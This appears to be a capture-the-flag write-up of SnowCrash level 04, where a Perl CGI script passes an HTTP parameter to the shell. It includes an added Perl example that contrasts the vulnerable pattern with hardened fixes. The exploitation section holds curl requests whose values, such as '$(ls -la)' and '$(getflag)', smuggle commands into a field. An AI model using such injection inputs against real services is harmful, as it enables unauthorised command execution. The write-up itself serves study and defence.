Introduction
In level 04, we encountered a Perl CGI script (level04.pl) vulnerable to command injection. By manipulating the input parameter, we were able to execute arbitrary commands on the server.
Perl CGI Code
level04@SnowCrash:~$ cat level04.pl
Vulnerability
The Perl script listens on port 4747 and accepts an “x” parameter via HTTP GET requests. It then directly echoes the parameter value without proper sanitization, leading to command injection.
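The script's source is not reproduced on this page, so the following added example (not the original level04.pl) assumes the usual form of this bug, where x is interpolated into a shell echo command, and sets it beside two hardened forms. The function names and the sample input are constructed for illustration.

```perl
#!/usr/bin/perl
# Added example; not the level04.pl from the page.
use strict;
use warnings;

# ASSUMED vulnerable pattern: x is interpolated into a command string, so
# /bin/sh parses it and expands $(...) or `...` before echo ever runs.
sub echo_via_shell {
    my ($x) = @_;
    return `echo $x 2>&1`;
}

# Hardened form 1: no child process; escape the value for the HTML response.
sub echo_in_perl {
    my ($x) = @_;
    my %ent = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    (my $safe = $x) =~ s/([&<>"'])/$ent{$1}/g;
    return "$safe\n";
}

# Hardened form 2: when an external program is required, use list-form open.
# The arguments go straight to exec(), so no shell interprets the value.
sub echo_via_exec {
    my ($x) = @_;
    open(my $fh, '-|', 'printf', '%s\n', $x) or die "cannot exec printf: $!";
    local $/;                       # slurp the child's whole output
    my $out = <$fh>;
    close($fh);
    return $out;
}

# Constructed, harmless sample value for the x parameter.
my $input = '$(printf INJECTED)';

print 'via shell : ', echo_via_shell($input);
print 'in Perl   : ', echo_in_perl($input);
print 'via exec  : ', echo_via_exec($input);
```

Only the first function lets the shell evaluate the value; the other two return it as literal text.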
Exploitation
Testing the Script
We tested the script by providing simple input:
curl -d x="test" http://127.0.0.1:4747
Result: test
Exploiting Command Injection
We injected commands to list files in the directory:
curl -d x="\$(ls -la)" http://127.0.0.1:4747
Result: Directory listing displayed.
Obtaining the Flag
Finally, we executed getflag to retrieve the flag:
curl -d x="\$(getflag)" http://127.0.0.1:4747
Conclusion
By exploiting the command injection vulnerability in the Perl CGI script, we successfully executed arbitrary commands on the system, ultimately obtaining the flag for level 04.